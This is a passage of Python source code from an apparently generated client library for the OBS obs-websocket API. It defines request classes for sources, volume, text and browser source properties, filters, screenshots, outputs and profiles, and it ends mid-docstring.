class GetMediaState(Baserequests):
"""Get the current playing state of a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*mediaState*
type: String
The media state of the provided source. States: `none`, `playing`, `opening`, `buffering`, `paused`, `stopped`, `ended`, `error`, `unknown`
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetMediaState'
self.datain['mediaState'] = None
self.dataout['sourceName'] = sourceName
def getMediaState(self):
return self.datain['mediaState']
class GetMediaSourcesList(Baserequests):
"""List the media state of all media sources (vlc and media source)
:Returns:
*mediaSources*
type: Array<Object>
Array of sources
*mediaSources.*.sourceName*
type: String
Unique source name
*mediaSources.*.sourceKind*
type: String
Unique source internal type (a.k.a `ffmpeg_source` or `vlc_source`)
*mediaSources.*.mediaState*
type: String
The current state of media for that source. States: `none`, `playing`, `opening`, `buffering`, `paused`, `stopped`, `ended`, `error`, `unknown`
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetMediaSourcesList'
self.datain['mediaSources'] = None
def getMediaSources(self):
return self.datain['mediaSources']
class CreateSource(Baserequests):
"""Create a source and add it as a sceneitem to a scene.
:Arguments:
*sourceName*
type: String
Source name.
*sourceKind*
type: String
Source kind, Eg. `vlc_source`.
*sceneName*
type: String
Scene to add the new source to.
*sourceSettings*
type: Object (optional)
Source settings data.
*setVisible*
type: boolean (optional)
Set the created SceneItem as visible or not. Defaults to true
:Returns:
*itemId*
type: int
ID of the SceneItem in the scene.
"""
def __init__(self, sourceName, sourceKind, sceneName, sourceSettings=None, setVisible=None):
Baserequests.__init__(self)
self.name = 'CreateSource'
self.datain['itemId'] = None
self.dataout['sourceName'] = sourceName
self.dataout['sourceKind'] = sourceKind
self.dataout['sceneName'] = sceneName
self.dataout['sourceSettings'] = sourceSettings
self.dataout['setVisible'] = setVisible
def getItemId(self):
return self.datain['itemId']
class GetSourcesList(Baserequests):
"""List all sources available in the running OBS instance
:Returns:
*sources*
type: Array<Object>
Array of sources
*sources.*.name*
type: String
Unique source name
*sources.*.typeId*
type: String
Non-unique source internal type (a.k.a kind)
*sources.*.type*
type: String
Source type. Value is one of the following: "input", "filter", "transition", "scene" or "unknown"
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSourcesList'
self.datain['sources'] = None
def getSources(self):
return self.datain['sources']
class GetSourceTypesList(Baserequests):
"""Get a list of all available sources types
:Returns:
*types*
type: Array<Object>
Array of source types
*types.*.typeId*
type: String
Non-unique internal source type ID
*types.*.displayName*
type: String
Display name of the source type
*types.*.type*
type: String
Type. Value is one of the following: "input", "filter", "transition" or "other"
*types.*.defaultSettings*
type: Object
Default settings of this source type
*types.*.caps*
type: Object
Source type capabilities
*types.*.caps.isAsync*
type: Boolean
True if source of this type provide frames asynchronously
*types.*.caps.hasVideo*
type: Boolean
True if sources of this type provide video
*types.*.caps.hasAudio*
type: Boolean
True if sources of this type provide audio
*types.*.caps.canInteract*
type: Boolean
True if interaction with this sources of this type is possible
*types.*.caps.isComposite*
type: Boolean
True if sources of this type composite one or more sub-sources
*types.*.caps.doNotDuplicate*
type: Boolean
True if sources of this type should not be fully duplicated
*types.*.caps.doNotSelfMonitor*
type: Boolean
True if sources of this type may cause a feedback loop if it's audio is monitored and shouldn't be
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSourceTypesList'
self.datain['types'] = None
def getTypes(self):
return self.datain['types']
class GetVolume(Baserequests):
"""Get the volume of the specified source. Default response uses mul format, NOT SLIDER PERCENTAGE.
:Arguments:
*source*
type: String
Source name.
*useDecibel*
type: boolean (optional)
Output volume in decibels of attenuation instead of amplitude/mul.
:Returns:
*name*
type: String
Source name.
*volume*
type: double
Volume of the source. Between `0.0` and `20.0` if using mul, under `26.0` if using dB.
*muted*
type: boolean
Indicates whether the source is muted.
"""
def __init__(self, source, useDecibel=None):
Baserequests.__init__(self)
self.name = 'GetVolume'
self.datain['name'] = None
self.datain['volume'] = None
self.datain['muted'] = None
self.dataout['source'] = source
self.dataout['useDecibel'] = useDecibel
def getName(self):
return self.datain['name']
def getVolume(self):
return self.datain['volume']
def getMuted(self):
return self.datain['muted']
class SetVolume(Baserequests):
"""Set the volume of the specified source. Default request format uses mul, NOT SLIDER PERCENTAGE.
:Arguments:
*source*
type: String
Source name.
*volume*
type: double
Desired volume. Must be between `0.0` and `20.0` for mul, and under 26.0 for dB. OBS will interpret dB values under -100.0 as Inf. Note: The OBS volume sliders only reach a maximum of 1.0mul/0.0dB, however OBS actually supports larger values.
*useDecibel*
type: boolean (optional)
Interperet `volume` data as decibels instead of amplitude/mul.
"""
def __init__(self, source, volume, useDecibel=None):
Baserequests.__init__(self)
self.name = 'SetVolume'
self.dataout['source'] = source
self.dataout['volume'] = volume
self.dataout['useDecibel'] = useDecibel
class GetMute(Baserequests):
"""Get the mute status of a specified source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*name*
type: String
Source name.
*muted*
type: boolean
Mute status of the source.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetMute'
self.datain['name'] = None
self.datain['muted'] = None
self.dataout['source'] = source
def getName(self):
return self.datain['name']
def getMuted(self):
return self.datain['muted']
class SetMute(Baserequests):
"""Sets the mute status of a specified source.
:Arguments:
*source*
type: String
Source name.
*mute*
type: boolean
Desired mute status.
"""
def __init__(self, source, mute):
Baserequests.__init__(self)
self.name = 'SetMute'
self.dataout['source'] = source
self.dataout['mute'] = mute
class ToggleMute(Baserequests):
"""Inverts the mute status of a specified source.
:Arguments:
*source*
type: String
Source name.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'ToggleMute'
self.dataout['source'] = source
class GetAudioActive(Baserequests):
"""Get the audio's active status of a specified source.
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*audioActive*
type: boolean
Audio active status of the source.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetAudioActive'
self.datain['audioActive'] = None
self.dataout['sourceName'] = sourceName
def getAudioActive(self):
return self.datain['audioActive']
class SetSourceName(Baserequests):
"""
Note: If the new name already exists as a source, obs-websocket will return an error.
:Arguments:
*sourceName*
type: String
Source name.
*newName*
type: String
New source name.
"""
def __init__(self, sourceName, newName):
Baserequests.__init__(self)
self.name = 'SetSourceName'
self.dataout['sourceName'] = sourceName
self.dataout['newName'] = newName
class SetSyncOffset(Baserequests):
"""Set the audio sync offset of a specified source.
:Arguments:
*source*
type: String
Source name.
*offset*
type: int
The desired audio sync offset (in nanoseconds).
"""
def __init__(self, source, offset):
Baserequests.__init__(self)
self.name = 'SetSyncOffset'
self.dataout['source'] = source
self.dataout['offset'] = offset
class GetSyncOffset(Baserequests):
"""Get the audio sync offset of a specified source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*name*
type: String
Source name.
*offset*
type: int
The audio sync offset (in nanoseconds).
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetSyncOffset'
self.datain['name'] = None
self.datain['offset'] = None
self.dataout['source'] = source
def getName(self):
return self.datain['name']
def getOffset(self):
return self.datain['offset']
class GetSourceSettings(Baserequests):
"""Get settings of the specified source
:Arguments:
*sourceName*
type: String
Source name.
*sourceType*
type: String (optional)
Type of the specified source. Useful for type-checking if you expect a specific settings schema.
:Returns:
*sourceName*
type: String
Source name
*sourceType*
type: String
Type of the specified source
*sourceSettings*
type: Object
Source settings (varies between source types, may require some probing around).
"""
def __init__(self, sourceName, sourceType=None):
Baserequests.__init__(self)
self.name = 'GetSourceSettings'
self.datain['sourceName'] = None
self.datain['sourceType'] = None
self.datain['sourceSettings'] = None
self.dataout['sourceName'] = sourceName
self.dataout['sourceType'] = sourceType
def getSourceName(self):
return self.datain['sourceName']
def getSourceType(self):
return self.datain['sourceType']
def getSourceSettings(self):
return self.datain['sourceSettings']
class SetSourceSettings(Baserequests):
"""Set settings of the specified source.
:Arguments:
*sourceName*
type: String
Source name.
*sourceType*
type: String (optional)
Type of the specified source. Useful for type-checking to avoid settings a set of settings incompatible with the actual source's type.
*sourceSettings*
type: Object
Source settings (varies between source types, may require some probing around).
:Returns:
*sourceName*
type: String
Source name
*sourceType*
type: String
Type of the specified source
*sourceSettings*
type: Object
Updated source settings
"""
def __init__(self, sourceName, sourceSettings, sourceType=None):
Baserequests.__init__(self)
self.name = 'SetSourceSettings'
self.datain['sourceName'] = None
self.datain['sourceType'] = None
self.datain['sourceSettings'] = None
self.dataout['sourceName'] = sourceName
self.dataout['sourceSettings'] = sourceSettings
self.dataout['sourceType'] = sourceType
def getSourceName(self):
return self.datain['sourceName']
def getSourceType(self):
return self.datain['sourceType']
def getSourceSettings(self):
return self.datain['sourceSettings']
class GetTextGDIPlusProperties(Baserequests):
"""Get the current properties of a Text GDI Plus source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*source*
type: String
Source name.
*align*
type: String
Text Alignment ("left", "center", "right").
*bk_color*
type: int
Background color.
*bk_opacity*
type: int
Background opacity (0-100).
*chatlog*
type: boolean
Chat log.
*chatlog_lines*
type: int
Chat log lines.
*color*
type: int
Text color.
*extents*
type: boolean
Extents wrap.
*extents_cx*
type: int
Extents cx.
*extents_cy*
type: int
Extents cy.
*file*
type: String
File path name.
*read_from_file*
type: boolean
Read text from the specified file.
*font*
type: Object
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String
Font face.
*font.flags*
type: int
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int
Font text size.
*font.style*
type: String
Font Style (unknown function).
*gradient*
type: boolean
Gradient enabled.
*gradient_color*
type: int
Gradient color.
*gradient_dir*
type: float
Gradient direction.
*gradient_opacity*
type: int
Gradient opacity (0-100).
*outline*
type: boolean
Outline.
*outline_color*
type: int
Outline color.
*outline_size*
type: int
Outline size.
*outline_opacity*
type: int
Outline opacity (0-100).
*text*
type: String
Text content to be displayed.
*valign*
type: String
Text vertical alignment ("top", "center", "bottom").
*vertical*
type: boolean
Vertical text enabled.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetTextGDIPlusProperties'
self.datain['source'] = None
self.datain['align'] = None
self.datain['bk_color'] = None
self.datain['bk_opacity'] = None
self.datain['chatlog'] = None
self.datain['chatlog_lines'] = None
self.datain['color'] = None
self.datain['extents'] = None
self.datain['extents_cx'] = None
self.datain['extents_cy'] = None
self.datain['file'] = None
self.datain['read_from_file'] = None
self.datain['font'] = None
self.datain['gradient'] = None
self.datain['gradient_color'] = None
self.datain['gradient_dir'] = None
self.datain['gradient_opacity'] = None
self.datain['outline'] = None
self.datain['outline_color'] = None
self.datain['outline_size'] = None
self.datain['outline_opacity'] = None
self.datain['text'] = None
self.datain['valign'] = None
self.datain['vertical'] = None
self.dataout['source'] = source
def getSource(self):
return self.datain['source']
def getAlign(self):
return self.datain['align']
def getBk_color(self):
return self.datain['bk_color']
def getBk_opacity(self):
return self.datain['bk_opacity']
def getChatlog(self):
return self.datain['chatlog']
def getChatlog_lines(self):
return self.datain['chatlog_lines']
def getColor(self):
return self.datain['color']
def getExtents(self):
return self.datain['extents']
def getExtents_cx(self):
return self.datain['extents_cx']
def getExtents_cy(self):
return self.datain['extents_cy']
def getFile(self):
return self.datain['file']
def getRead_from_file(self):
return self.datain['read_from_file']
def getFont(self):
return self.datain['font']
def getGradient(self):
return self.datain['gradient']
def getGradient_color(self):
return self.datain['gradient_color']
def getGradient_dir(self):
return self.datain['gradient_dir']
def getGradient_opacity(self):
return self.datain['gradient_opacity']
def getOutline(self):
return self.datain['outline']
def getOutline_color(self):
return self.datain['outline_color']
def getOutline_size(self):
return self.datain['outline_size']
def getOutline_opacity(self):
return self.datain['outline_opacity']
def getText(self):
return self.datain['text']
def getValign(self):
return self.datain['valign']
def getVertical(self):
return self.datain['vertical']
class SetTextGDIPlusProperties(Baserequests):
"""Set the current properties of a Text GDI Plus source.
:Arguments:
*source*
type: String
Name of the source.
*align*
type: String (optional)
Text Alignment ("left", "center", "right").
*bk_color*
type: int (optional)
Background color.
*bk_opacity*
type: int (optional)
Background opacity (0-100).
*chatlog*
type: boolean (optional)
Chat log.
*chatlog_lines*
type: int (optional)
Chat log lines.
*color*
type: int (optional)
Text color.
*extents*
type: boolean (optional)
Extents wrap.
*extents_cx*
type: int (optional)
Extents cx.
*extents_cy*
type: int (optional)
Extents cy.
*file*
type: String (optional)
File path name.
*read_from_file*
type: boolean (optional)
Read text from the specified file.
*font*
type: Object (optional)
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String (optional)
Font face.
*font.flags*
type: int (optional)
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int (optional)
Font text size.
*font.style*
type: String (optional)
Font Style (unknown function).
*gradient*
type: boolean (optional)
Gradient enabled.
*gradient_color*
type: int (optional)
Gradient color.
*gradient_dir*
type: float (optional)
Gradient direction.
*gradient_opacity*
type: int (optional)
Gradient opacity (0-100).
*outline*
type: boolean (optional)
Outline.
*outline_color*
type: int (optional)
Outline color.
*outline_size*
type: int (optional)
Outline size.
*outline_opacity*
type: int (optional)
Outline opacity (0-100).
*text*
type: String (optional)
Text content to be displayed.
*valign*
type: String (optional)
Text vertical alignment ("top", "center", "bottom").
*vertical*
type: boolean (optional)
Vertical text enabled.
*render*
type: boolean (optional)
Visibility of the scene item.
"""
def __init__(self, source, align=None, bk_color=None, bk_opacity=None, chatlog=None, chatlog_lines=None, color=None, extents=None, extents_cx=None, extents_cy=None, file=None, read_from_file=None, font=None, gradient=None, gradient_color=None, gradient_dir=None, gradient_opacity=None, outline=None, outline_color=None, outline_size=None, outline_opacity=None, text=None, valign=None, vertical=None, render=None):
Baserequests.__init__(self)
self.name = 'SetTextGDIPlusProperties'
self.dataout['source'] = source
self.dataout['align'] = align
self.dataout['bk_color'] = bk_color
self.dataout['bk_opacity'] = bk_opacity
self.dataout['chatlog'] = chatlog
self.dataout['chatlog_lines'] = chatlog_lines
self.dataout['color'] = color
self.dataout['extents'] = extents
self.dataout['extents_cx'] = extents_cx
self.dataout['extents_cy'] = extents_cy
self.dataout['file'] = file
self.dataout['read_from_file'] = read_from_file
self.dataout['font'] = font
self.dataout['gradient'] = gradient
self.dataout['gradient_color'] = gradient_color
self.dataout['gradient_dir'] = gradient_dir
self.dataout['gradient_opacity'] = gradient_opacity
self.dataout['outline'] = outline
self.dataout['outline_color'] = outline_color
self.dataout['outline_size'] = outline_size
self.dataout['outline_opacity'] = outline_opacity
self.dataout['text'] = text
self.dataout['valign'] = valign
self.dataout['vertical'] = vertical
self.dataout['render'] = render
class GetTextFreetype2Properties(Baserequests):
"""Get the current properties of a Text Freetype 2 source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*source*
type: String
Source name
*color1*
type: int
Gradient top color.
*color2*
type: int
Gradient bottom color.
*custom_width*
type: int
Custom width (0 to disable).
*drop_shadow*
type: boolean
Drop shadow.
*font*
type: Object
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String
Font face.
*font.flags*
type: int
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int
Font text size.
*font.style*
type: String
Font Style (unknown function).
*from_file*
type: boolean
Read text from the specified file.
*log_mode*
type: boolean
Chat log.
*outline*
type: boolean
Outline.
*text*
type: String
Text content to be displayed.
*text_file*
type: String
File path.
*word_wrap*
type: boolean
Word wrap.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetTextFreetype2Properties'
self.datain['source'] = None
self.datain['color1'] = None
self.datain['color2'] = None
self.datain['custom_width'] = None
self.datain['drop_shadow'] = None
self.datain['font'] = None
self.datain['from_file'] = None
self.datain['log_mode'] = None
self.datain['outline'] = None
self.datain['text'] = None
self.datain['text_file'] = None
self.datain['word_wrap'] = None
self.dataout['source'] = source
def getSource(self):
return self.datain['source']
def getColor1(self):
return self.datain['color1']
def getColor2(self):
return self.datain['color2']
def getCustom_width(self):
return self.datain['custom_width']
def getDrop_shadow(self):
return self.datain['drop_shadow']
def getFont(self):
return self.datain['font']
def getFrom_file(self):
return self.datain['from_file']
def getLog_mode(self):
return self.datain['log_mode']
def getOutline(self):
return self.datain['outline']
def getText(self):
return self.datain['text']
def getText_file(self):
return self.datain['text_file']
def getWord_wrap(self):
return self.datain['word_wrap']
class SetTextFreetype2Properties(Baserequests):
"""Set the current properties of a Text Freetype 2 source.
:Arguments:
*source*
type: String
Source name.
*color1*
type: int (optional)
Gradient top color.
*color2*
type: int (optional)
Gradient bottom color.
*custom_width*
type: int (optional)
Custom width (0 to disable).
*drop_shadow*
type: boolean (optional)
Drop shadow.
*font*
type: Object (optional)
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String (optional)
Font face.
*font.flags*
type: int (optional)
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int (optional)
Font text size.
*font.style*
type: String (optional)
Font Style (unknown function).
*from_file*
type: boolean (optional)
Read text from the specified file.
*log_mode*
type: boolean (optional)
Chat log.
*outline*
type: boolean (optional)
Outline.
*text*
type: String (optional)
Text content to be displayed.
*text_file*
type: String (optional)
File path.
*word_wrap*
type: boolean (optional)
Word wrap.
"""
def __init__(self, source, color1=None, color2=None, custom_width=None, drop_shadow=None, font=None, from_file=None, log_mode=None, outline=None, text=None, text_file=None, word_wrap=None):
Baserequests.__init__(self)
self.name = 'SetTextFreetype2Properties'
self.dataout['source'] = source
self.dataout['color1'] = color1
self.dataout['color2'] = color2
self.dataout['custom_width'] = custom_width
self.dataout['drop_shadow'] = drop_shadow
self.dataout['font'] = font
self.dataout['from_file'] = from_file
self.dataout['log_mode'] = log_mode
self.dataout['outline'] = outline
self.dataout['text'] = text
self.dataout['text_file'] = text_file
self.dataout['word_wrap'] = word_wrap
class GetBrowserSourceProperties(Baserequests):
"""Get current properties for a Browser Source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*source*
type: String
Source name.
*is_local_file*
type: boolean
Indicates that a local file is in use.
*local_file*
type: String
file path.
*url*
type: String
Url.
*css*
type: String
CSS to inject.
*width*
type: int
Width.
*height*
type: int
Height.
*fps*
type: int
Framerate.
*shutdown*
type: boolean
Indicates whether the source should be shutdown when not visible.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetBrowserSourceProperties'
self.datain['source'] = None
self.datain['is_local_file'] = None
self.datain['local_file'] = None
self.datain['url'] = None
self.datain['css'] = None
self.datain['width'] = None
self.datain['height'] = None
self.datain['fps'] = None
self.datain['shutdown'] = None
self.dataout['source'] = source
def getSource(self):
return self.datain['source']
def getIs_local_file(self):
return self.datain['is_local_file']
def getLocal_file(self):
return self.datain['local_file']
def getUrl(self):
return self.datain['url']
def getCss(self):
return self.datain['css']
def getWidth(self):
return self.datain['width']
def getHeight(self):
return self.datain['height']
def getFps(self):
return self.datain['fps']
def getShutdown(self):
return self.datain['shutdown']
class SetBrowserSourceProperties(Baserequests):
"""Set current properties for a Browser Source.
:Arguments:
*source*
type: String
Name of the source.
*is_local_file*
type: boolean (optional)
Indicates that a local file is in use.
*local_file*
type: String (optional)
file path.
*url*
type: String (optional)
Url.
*css*
type: String (optional)
CSS to inject.
*width*
type: int (optional)
Width.
*height*
type: int (optional)
Height.
*fps*
type: int (optional)
Framerate.
*shutdown*
type: boolean (optional)
Indicates whether the source should be shutdown when not visible.
*render*
type: boolean (optional)
Visibility of the scene item.
"""
def __init__(self, source, is_local_file=None, local_file=None, url=None, css=None, width=None, height=None, fps=None, shutdown=None, render=None):
Baserequests.__init__(self)
self.name = 'SetBrowserSourceProperties'
self.dataout['source'] = source
self.dataout['is_local_file'] = is_local_file
self.dataout['local_file'] = local_file
self.dataout['url'] = url
self.dataout['css'] = css
self.dataout['width'] = width
self.dataout['height'] = height
self.dataout['fps'] = fps
self.dataout['shutdown'] = shutdown
self.dataout['render'] = render
class GetSpecialSources(Baserequests):
"""Get configured special sources like Desktop Audio and Mic/Aux sources.
:Returns:
*desktop_1*
type: String (optional)
Name of the first Desktop Audio capture source.
*desktop_2*
type: String (optional)
Name of the second Desktop Audio capture source.
*mic_1*
type: String (optional)
Name of the first Mic/Aux input source.
*mic_2*
type: String (optional)
Name of the second Mic/Aux input source.
*mic_3*
type: String (optional)
NAme of the third Mic/Aux input source.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSpecialSources'
self.datain['desktop-1'] = None
self.datain['desktop-2'] = None
self.datain['mic-1'] = None
self.datain['mic-2'] = None
self.datain['mic-3'] = None
def getDesktop1(self):
return self.datain['desktop-1']
def getDesktop2(self):
return self.datain['desktop-2']
def getMic1(self):
return self.datain['mic-1']
def getMic2(self):
return self.datain['mic-2']
def getMic3(self):
return self.datain['mic-3']
class GetSourceFilters(Baserequests):
"""List filters applied to a source
:Arguments:
*sourceName*
type: String
Source name
:Returns:
*filters*
type: Array<Object>
List of filters for the specified source
*filters.*.enabled*
type: Boolean
Filter status (enabled or not)
*filters.*.type*
type: String
Filter type
*filters.*.name*
type: String
Filter name
*filters.*.settings*
type: Object
Filter settings
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetSourceFilters'
self.datain['filters'] = None
self.dataout['sourceName'] = sourceName
def getFilters(self):
return self.datain['filters']
class GetSourceFilterInfo(Baserequests):
"""List filters applied to a source
:Arguments:
*sourceName*
type: String
Source name
*filterName*
type: String
Source filter name
:Returns:
*enabled*
type: Boolean
Filter status (enabled or not)
*type*
type: String
Filter type
*name*
type: String
Filter name
*settings*
type: Object
Filter settings
"""
def __init__(self, sourceName, filterName):
Baserequests.__init__(self)
self.name = 'GetSourceFilterInfo'
self.datain['enabled'] = None
self.datain['type'] = None
self.datain['name'] = None
self.datain['settings'] = None
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
def getEnabled(self):
return self.datain['enabled']
def getType(self):
return self.datain['type']
def getName(self):
return self.datain['name']
def getSettings(self):
return self.datain['settings']
class AddFilterToSource(Baserequests):
"""Add a new filter to a source. Available source types along with their settings properties are available from `GetSourceTypesList`.
:Arguments:
*sourceName*
type: String
Name of the source on which the filter is added
*filterName*
type: String
Name of the new filter
*filterType*
type: String
Filter type
*filterSettings*
type: Object
Filter settings
"""
def __init__(self, sourceName, filterName, filterType, filterSettings):
Baserequests.__init__(self)
self.name = 'AddFilterToSource'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['filterType'] = filterType
self.dataout['filterSettings'] = filterSettings
class RemoveFilterFromSource(Baserequests):
"""Remove a filter from a source
:Arguments:
*sourceName*
type: String
Name of the source from which the specified filter is removed
*filterName*
type: String
Name of the filter to remove
"""
def __init__(self, sourceName, filterName):
Baserequests.__init__(self)
self.name = 'RemoveFilterFromSource'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
class ReorderSourceFilter(Baserequests):
"""Move a filter in the chain (absolute index positioning)
:Arguments:
*sourceName*
type: String
Name of the source to which the filter belongs
*filterName*
type: String
Name of the filter to reorder
*newIndex*
type: Integer
Desired position of the filter in the chain
"""
def __init__(self, sourceName, filterName, newIndex):
Baserequests.__init__(self)
self.name = 'ReorderSourceFilter'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['newIndex'] = newIndex
class MoveSourceFilter(Baserequests):
"""Move a filter in the chain (relative positioning)
:Arguments:
*sourceName*
type: String
Name of the source to which the filter belongs
*filterName*
type: String
Name of the filter to reorder
*movementType*
type: String
How to move the filter around in the source's filter chain. Either "up", "down", "top" or "bottom".
"""
def __init__(self, sourceName, filterName, movementType):
Baserequests.__init__(self)
self.name = 'MoveSourceFilter'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['movementType'] = movementType
class SetSourceFilterSettings(Baserequests):
"""Update settings of a filter
:Arguments:
*sourceName*
type: String
Name of the source to which the filter belongs
*filterName*
type: String
Name of the filter to reconfigure
*filterSettings*
type: Object
New settings. These will be merged to the current filter settings.
"""
def __init__(self, sourceName, filterName, filterSettings):
Baserequests.__init__(self)
self.name = 'SetSourceFilterSettings'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['filterSettings'] = filterSettings
class SetSourceFilterVisibility(Baserequests):
"""Change the visibility/enabled state of a filter
:Arguments:
*sourceName*
type: String
Source name
*filterName*
type: String
Source filter name
*filterEnabled*
type: Boolean
New filter state
"""
def __init__(self, sourceName, filterName, filterEnabled):
Baserequests.__init__(self)
self.name = 'SetSourceFilterVisibility'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['filterEnabled'] = filterEnabled
class GetAudioMonitorType(Baserequests):
"""Get the audio monitoring type of the specified source.
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*monitorType*
type: String
The monitor type in use. Options: `none`, `monitorOnly`, `monitorAndOutput`.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetAudioMonitorType'
self.datain['monitorType'] = None
self.dataout['sourceName'] = sourceName
def getMonitorType(self):
return self.datain['monitorType']
class SetAudioMonitorType(Baserequests):
"""Set the audio monitoring type of the specified source.
:Arguments:
*sourceName*
type: String
Source name.
*monitorType*
type: String
The monitor type to use. Options: `none`, `monitorOnly`, `monitorAndOutput`.
"""
def __init__(self, sourceName, monitorType):
Baserequests.__init__(self)
self.name = 'SetAudioMonitorType'
self.dataout['sourceName'] = sourceName
self.dataout['monitorType'] = monitorType
class TakeSourceScreenshot(Baserequests):
"""
At least `embedPictureFormat` or `saveToFilePath` must be specified.
Clients can specify `width` and `height` parameters to receive scaled pictures. Aspect ratio is
preserved if only one of these two parameters is specified.
:Arguments:
*sourceName*
type: String (optional)
Source name. Note that, since scenes are also sources, you can also provide a scene name. If not provided, the currently active scene is used.
*embedPictureFormat*
type: String (optional)
Format of the Data URI encoded picture. Can be "png", "jpg", "jpeg" or "bmp" (or any other value supported by Qt's Image module)
*saveToFilePath*
type: String (optional)
Full file path (file extension included) where the captured image is to be saved. Can be in a format different from `pictureFormat`. Can be a relative path.
*fileFormat*
type: String (optional)
Format to save the image file as (one of the values provided in the `supported-image-export-formats` response field of `GetVersion`). If not specified, tries to guess based on file extension.
*compressionQuality*
type: int (optional)
Compression ratio between -1 and 100 to write the image with. -1 is automatic, 1 is smallest file/most compression, 100 is largest file/least compression. Varies with image type.
*width*
type: int (optional)
Screenshot width. Defaults to the source's base width.
*height*
type: int (optional)
Screenshot height. Defaults to the source's base height.
:Returns:
*sourceName*
type: String
Source name
*img*
type: String
Image Data URI (if `embedPictureFormat` was specified in the request)
*imageFile*
type: String
Absolute path to the saved image file (if `saveToFilePath` was specified in the request)
"""
def __init__(self, sourceName=None, embedPictureFormat=None, saveToFilePath=None, fileFormat=None, compressionQuality=None, width=None, height=None):
Baserequests.__init__(self)
self.name = 'TakeSourceScreenshot'
self.datain['sourceName'] = None
self.datain['img'] = None
self.datain['imageFile'] = None
self.dataout['sourceName'] = sourceName
self.dataout['embedPictureFormat'] = embedPictureFormat
self.dataout['saveToFilePath'] = saveToFilePath
self.dataout['fileFormat'] = fileFormat
self.dataout['compressionQuality'] = compressionQuality
self.dataout['width'] = width
self.dataout['height'] = height
def getSourceName(self):
return self.datain['sourceName']
def getImg(self):
return self.datain['img']
def getImageFile(self):
return self.datain['imageFile']
class ListOutputs(Baserequests):
"""List existing outputs
:Returns:
*outputs*
type: Array<Output>
Outputs list
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ListOutputs'
self.datain['outputs'] = None
def getOutputs(self):
return self.datain['outputs']
class GetOutputInfo(Baserequests):
"""Get information about a single output
:Arguments:
*outputName*
type: String
Output name
:Returns:
*outputInfo*
type: Output
Output info
"""
def __init__(self, outputName):
Baserequests.__init__(self)
self.name = 'GetOutputInfo'
self.datain['outputInfo'] = None
self.dataout['outputName'] = outputName
def getOutputInfo(self):
return self.datain['outputInfo']
class StartOutput(Baserequests):
"""
Note: Controlling outputs is an experimental feature of obs-websocket. Some plugins which add outputs to OBS may not function properly when they are controlled in this way.
:Arguments:
*outputName*
type: String
Output name
"""
def __init__(self, outputName):
Baserequests.__init__(self)
self.name = 'StartOutput'
self.dataout['outputName'] = outputName
class StopOutput(Baserequests):
"""
Note: Controlling outputs is an experimental feature of obs-websocket. Some plugins which add outputs to OBS may not function properly when they are controlled in this way.
:Arguments:
*outputName*
type: String
Output name
*force*
type: boolean (optional)
Force stop (default: false)
"""
def __init__(self, outputName, force=None):
Baserequests.__init__(self)
self.name = 'StopOutput'
self.dataout['outputName'] = outputName
self.dataout['force'] = force
class SetCurrentProfile(Baserequests):
"""Set the currently active profile.
:Arguments:
*profile_name*
type: String
Name of the desired profile.
"""
def __init__(self, profile_name):
Baserequests.__init__(self)
self.name = 'SetCurrentProfile'
self.dataout['profile-name'] = profile_name
class GetCurrentProfile(Baserequests):
"""Get the name of the current profile.
:Returns:
*profile_name*
type: String
Name of the currently active profile.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentProfile'
self.datain['profile-name'] = None
def getProfileName(self):
return self.datain['profile-name']
class ListProfiles(Baserequests):
"""Get a list of available profiles.
:Returns:
*profiles*
type: Array<Object>
List of available profiles.
*profiles.*.profile_name*
type: String
Filter name
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ListProfiles'
self.datain['profiles'] = None
def getProfiles(self):
return self.datain['profiles']
class GetRecordingStatus(Baserequests):
"""Get current recording status.
:Returns:
*isRecording*
type: boolean
Current recording status.
*isRecordingPaused*
type: boolean
